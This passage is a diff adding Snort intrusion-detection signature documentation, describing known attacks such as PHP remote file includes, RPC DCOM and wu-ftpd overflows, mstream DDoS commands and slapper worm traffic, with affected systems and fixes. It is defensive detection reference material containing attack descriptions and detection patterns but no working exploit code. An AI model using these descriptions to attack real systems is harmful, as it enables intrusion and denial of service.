+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2398.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2398
+
+--
+Summary:
+This event is generated when an attempt is made to exploit the PHP web
+application WAnewsletter.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the WAnewsletter PHP web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to the
+execution of arbitrary code of the atttackers choosing.
+
+--
+Affected Systems:
+	WAnewsletter
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including a file in
+parameters supplied to the script newsletter.php or db_type.php.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000177.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000177
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a Linksys WRT54G wireless router.
+
+-- 
+Impact: 
+Unauthorized administrative access to the router and it's configuration.
+
+--
+Detailed Information:
+A vulnerability exists in the Linksys WRT54G wireless router that may present 
+an attacker with the opportunity to take control of the victim hardware via a 
+POST request to the web interface.
+
+This is due to the apply.cgi script not performing proper checks on user 
+supplied input that may allow the attacker to overflow a fixed length buffer 
+and execute code of their choosing.
+
+--
+Affected Systems:
+Linksys WRT54G Wireless Router firmware 4.0.4.20.6 and prior
+
+--
+Attack Scenarios: 
+An attacker can supply a malformed POST request to the apply.cgi script on an 
+affected piece of hardware.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied firmware upgrade.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3159.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3159
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3369.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3369
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1811.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1811
+
+--
+Summary:
+This event is generated when a remote user has exploited a flaw in a 
+local SSH server.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+OpenSSH has a flaw in the challenge-response mechanism when configured 
+with either the "PAMAuthenticationViaKbdInt" or the 
+"ChallengeResponseAuthentication" options. This flaw can be exploited by
+a user who is not authenicated and can lead to the attacker obtaining a 
+root shell.
+
+--
+Affected Systems:
+OpenSSH versions 1.2 to 3.3, Solaris 9.0, IBM Linux 
+Affinity Toolkit, and HP HP-UX Secure Shell A.03.10.
+
+--
+Attack Scenarios:
+An attacker can cause the service to restart or hang, leaving the 
+service unavailable to users.
+
+--
+Ease of Attack:
+Simple. Exploit code available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to latest version of OpenSSH
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5093
+
+--
--- /dev/null
+++ b/doc/signatures/100000388.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000388
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "topman.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "topman.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/798.txt
@@ -0,0 +1,62 @@
+
+Rule:  
+
+--
+Sid:
+798
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is a picture - e.g. nicegirl.gif.vbs gets displayed as
+nicegirl.gif but is a visual basic script and not a picture.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+None Known
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+See websites of antivirus companies.
+
+--
--- /dev/null
+++ b/doc/signatures/350.txt
@@ -0,0 +1,63 @@
+SID:
+350
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible execution of commands on the affected server as with elevated user privileges
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) has a problem with very 
+log directory names. There is insufficent checking on directories 
+created by users allowing possible insertion of data into the stack.This
+can lead to execution of code with root / elevated user privileges.
+--
+
+Affected Systems:
+NcFTP Software NcFTPD 2.3.5
+Washington University wu-ftpd 2.4.2 (beta 18) VR10 
+RedHat wu-ftpd 2.4.2 b18-2 
+Washington University wu-ftpd 2.4.2 academ[BETA-18] 
+Probably others as well, susspect anything under Washington University wu-ftpd 2.6.0 for this particular exploit.
+--
+
+Attack Scenarios:
+A local attacker will attempt to create long named directories on the 
+ftp server wich are not checked correctly in the server code. This can 
+allow commands to be executed with elevated user privileges
+--
+
+Ease of Attack:
+simple, Exploit code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to newest version of wuftpd, or replace with something more secure.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2329.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2329
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Windows Data Access Components.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible. Denial of Service
+(DoS)
+
+--
+Detailed Information:
+It may be possible for an attacker to send a specially crafted response
+to a client broadcast query searching for an SQL server. This response
+could take advantage of a buffer overrun condition in an MDAC component
+which may result in the attacker being presented with the opportunity to 
+execute code of their choosing with the privileges of the user running
+the service on the client system.
+
+A DoS condition may also manifest in MDAC version 2.8.
+
+MDAC is included by default on many Microsoft Windows systems. Client
+workstations may make regular broadcast announcements in an attempt to
+find SQL servers.
+
+--
+Affected Systems:
+	Microsoft Data Access Components 2.5
+	Microsoft Data Access Components 2.6
+	Microsoft Data Access Components 2.7
+	Microsoft Data Access Components 2.8
+
+--
+Attack Scenarios:
+The attacker may spoof the response from an SQL server to exploit the
+vulnerability.
+
+--
+Ease of Attack:
+Moderate..
+
+--
+False Positives:
+Since this rule cannot be constrained using ports and the connection
+state for MSDAC is not tracked, false positive events may occur under
+normal circumstances. The $SQL_SERVERS variable in snort.conf should be
+configured correctly to eliminate this behavior.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Disallow access to database servers from sources external to the
+protected network.
+
+Disallow access to database servers from untrusted hosts.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/244.txt
@@ -0,0 +1,57 @@
+Rule:
+--
+Sid:
+244
+
+--
+Summary:
+This event is generated when a DDoS mstream handler directs an mstream agent to begin an attack against a specified target. 
+
+--
+Impactn:
+Severe. If the listed source IP is in your network, it may be an mstream handler.  If the listed destination IP is in your network, it may be an mstream agent.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  A handler can direct a particular agent to attack a target. It directs the agent by sending it a UDP packet to destination port 10498 with a string of "stream/" in the payload.  The target IP and duration of the attack will also be included in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes an mstream agent, it will likely be directed to participate in a DDoS attack.
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known handler-to-agent ports in addition to 10498.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
--- /dev/null
+++ b/doc/signatures/1889.txt
@@ -0,0 +1,56 @@
+Nigel, Removed isc.incidents.org reference since it is no longer active.
+Rule:
+
+--
+Sid:
+1889
+
+--
+Summary:
+This event is generated when a web server infected by the slapper worm attempts to send traffic via a communication channel. 
+
+--
+Impact:
+Remote access and potentially denial of service.  A slapper worm infection indicates a successful compromise of the host.  A communication channel established between infected hosts can be used as a vehicle for a distributed denial of service attack of a target host or network.
+
+--
+Detailed Information:
+The Apache/mod_ssl worm, also known as slapper, exploits a vulnerability associated with certain versions of OpenSSL.  Once a host has been infected by the worm, the worm then attempts to establish a communication channel using UDP port 2002 (both source and destination) to the infecting host.  This communication channel is used to create a network for infected hosts to communicate with each other to identify other infected hosts and to deliver attack instructions for other sites.
+
+--
+Affected Systems:
+Linux hosts running Apache with mod_ssl using SSLv2-enabled OpenSSL 0.9.6d or earlier on Intel x86 architectures.
+
+--
+Attack Scenarios:
+The communication channel created by the slapper worm allows infected hosts to receive direction from other infected hosts.  This can be used, for instance, to coordinate a DDoS attack.
+
+--
+Ease of Attack:
+Simple.  Exploit code exists. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It has been observed that the port number for the communication channel may vary.  Ports 1978 and 4156 have also been seen.
+
+--
+Corrective Action:
+Apply the appropriate patch or upgrade to the most current version of OpenSSL.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-2002-27.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000172.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000172
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Lynx text-based web browser.
+
+-- 
+Impact: 
+Code execution on the victim machine with the privileges of the user running 
+Lynx.
+
+--
+Detailed Information:
+A vulnerability exists in the way that Lynx handles links when browsing NNTP 
+resources. The function that handles the display of information from article 
+headers when listing available files on the server, inserts extra characters to 
+handle certain character sets. This function does not properly check how much 
+extra data is inserted and it is possible to overflow a static buffer and 
+execute code in the context of the browser process.
+
+--
+Affected Systems:
+Lynx versions 2.8.6 and prior
+
+--
+Attack Scenarios: 
+An attacker would need to supply a malicious link on an nntp server to the user 
+using Lynx.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Apply the appropriate patch.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Original advisory posting:
+http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
+
+--
--- /dev/null
+++ b/doc/signatures/2589.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2589
+
+--
+Summary:
+This event is generated when an attempt is made to return to
+a web client a file in the Content-Disposition Header with a
+Class ID (CLSID) embedded in the file name.
+
+--
+Impact:
+A successful attack may trick a client on a vulnerable host to download
+a malicious file that will be executed by the Windows Shell.
+
+--
+Detailed Information:
+Internet Explorer does not correctly handle or display specially
+crafted files in the browser dialogue where the user choses the
+action (e.g., open, save, cancel) for a downloaded file.
+Specifically, these are overly long file names that employ URL
+encoding of "." %2E before the file extension and contain the
+Class ID (CLSID) associated with the Windows Shell in the file name.
+
+This serves two purposes; the first is that the file name will
+be truncated in the user dialog so the user doesn't see the
+CLSID reference, making it appear to be a more innocuous file
+with a known extension such as mpg or pdf.  Second, the downloaded
+file will actually contain malcious commands that will be
+executed by the Windows Shell when opened because of the hidden
+CLSID in the file name.
+
+Currently, the only known CLSID that exploits this vulnerability
+is associated with the Windows Shell.  Yet, it may be possible
+for another CLSID to be discovered in the future that would be
+associated with a COM component that could be used for malicious
+purposes.
+
+--
+Affected Systems:
+	Windows NT Workstation/Server 4.0 SP6a
+	Windows NT Workstation/Server 4.0 SP6a with Active Desktop
+	Windows NT Server 4.0 Terminal Server Edition SP6
+	Windows 2000 SP2-SP4
+	Windows XP and XP SP1
+	Windows XP 64-Bit Edition SP1
+	Windows XP 64-Bit Edition Version 2003
+	Windows Server 2003
+	Windows Server 2003 64-Bit Edition
+
+--
+Attack Scenarios:
+An attacker can entice a user to visit a web server that
+will return a malicious file with a file name that contains
+a CLSID, perhaps enabling the execution of the malicious
+code when the file is opened.
+
+--
+Ease of Attack:
+Simple. Exploit code is publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0420
+
+Bugtraq:
+http://www.securityfocus.com/bid/9510
+
+Other:
+http://www.microsoft.com/technet/security/bulletin/ms04-024.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/100000382.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000382
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_users.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_users.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1784.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1784
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "nude celeb".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "nude celeb".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2188.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2188
+
+--
+Summary:
+This event is generated when a suspicious packet using an unusual 
+protocol is sent to a router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in multiple Cisco IOS versions such that a Denial
+of Service condition can be issued against a device by sending multiple 
+packets using IP protocols 53, 55, 77 and 103 directly to that device.
+
+Cisco IOS processes these packets and under certain circumstances, can 
+be made to incorrectly flag an input interface as being full.
+
+--
+Affected Systems:
+Multiple versions of Cisco IOS.
+
+--
+Attack Scenarios:
+An attacker may send a large number of IP packets using one of the 
+protocols 53, 55, 77 or 103 directly to a router. Exploit code exists.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3308.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3308
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2721.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2721
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_columns_to_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000321.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000321
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "help.php" using a remote file being passed as 
+the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "help.php" script used by 
+the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2895.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2895
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_varchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
